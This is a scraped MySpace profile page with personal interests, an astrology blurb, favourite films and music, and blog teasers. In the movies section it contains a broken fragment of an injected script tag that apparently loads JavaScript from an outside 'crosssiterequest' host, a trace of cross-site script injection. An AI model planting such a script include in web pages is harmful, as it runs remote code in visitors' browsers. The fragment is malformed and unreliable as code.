M$.FOXY profile picture



About Me

I am a great Friend and listener... I love my Baby Missy (puppy) RIP 10/20/06.... I love to eat sleep and dance!
Get Your Own Voice Player ManagePiscesYour sexuality is steady, yet unorthodox. You are experimental and love the unorthodox and the unusual in sexual encounters, which you often undergo, for you are not afraid to follow your desires. Ruled by Uranus, the unconventional god of the sky, you always aim high and wild, although your co-ruler, Saturn, the god of karma and restriction, usually keeps your feet firmly on the ground. An unconventional nature makes you impatient with less adventurous souls, while your powerful intellect propels you into original thought and desire to take things to the limit in unusual directions. Your sex-drive is not unduly strong, yet your need to explore and be stimulated sometimes gives others the impression that your desires are rampant! Be that as it may, you are open to all forms of experimentation (in the search for new knowledge) and the field of sexuality and relationships is no exception. You are attracted to partners with interesting and unconventional minds (and bodies) and if their sexuality is unconventional, well you'll play along at least until you've extracted a new chapter for your own personal x-files.. You are a sucker for anything that breaks new ground. You are however able to view your body's activities in quite a detached light, something that partners find difficult to understand. Admirers should be aware of your need for experimentation and, from time to time, need for solitude to recharge your batteries.

My Interests

I am interested in one day owning several businesses such as: a theatre, a Dance school/Acadamy (welcoming the deaf community with open arms), a hotel, daycare, and spa. I know it sounds like a lot, but it could happen.

I'd like to meet:

I would love to meet Micheal Jackson(who wouldn't).The original 007 Sean Connery the sexiest man on earth, The Rock,and Bill Clinton. If I could bring any one back to life and meet the... They would consist of my Biological grand mother, Kathrine Dunham, Etta James, Aaliyah, Bob Marley.Mythology....Aphroditie, Aries,Achilles (in hopes that he is as sexy as Brad Pitt played him.)
M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy Click here to get Falling Objects M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy M$.Foxy


I love music, all music!!!! ( My favorite is Reagge!!)
Girly Myspace Layouts

Sexy New Graphics at HitupMyspace.com


I love movies, all movies!!! My favorite type of movies are any movies with the SEXIEST man on earth SEAN CONNERY, and any movie with VAMPIRES..... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document.write("..1...{}");}..


CSI(all of them Miami, New York, Vegas, etc)& Law and Order
Get your own countdown at BlingyBlob.com

MySpace Avatars Lyrics


I love all Vampire books, and greek mythology. If I could compare myslef to any greek god it would have to be Aphroditie or Cleopetra.


My heros are my lord and savior Jesus Christ, my mother, and Promethus...

My Blog


There was a blind girl who used to hate everyone except her boyfriend. She always said," I would marry you if I could see you!!!" Suddenly one day someone donated her a pair of eyes, and when she saw...
Posted by M$.FOXY on Wed, 14 Feb 2007 01:49:00 PST


Those who know me well, knew that this conversation was long over due. I am at a point in my life that career decisions are being made, real life is starting to feed on my intelligence and m...
Posted by M$.FOXY on Fri, 12 Jan 2007 11:23:00 PST

Check out this video: Gansta Happy Feet Remix

This is just to Damn Cute!!!!Get this video and more at MySpace.com...
Posted by M$.FOXY on Fri, 29 Dec 2006 11:52:00 PST

Time Warner Cable is a "BUG-A-BOO"

Hay now we all know that Cable and Satelite TV play a big part in our lives, but who the hell gave Comcast permission to switch to Time Warner Cable?        &nb...
Posted by M$.FOXY on Thu, 26 Oct 2006 12:03:00 PST

Party it up

I am having a party guys!!! Get at me for more details.. August 18th at City Streets. This is by invitation only so get at me on the details......
Posted by M$.FOXY on Thu, 03 Aug 2006 01:00:00 PST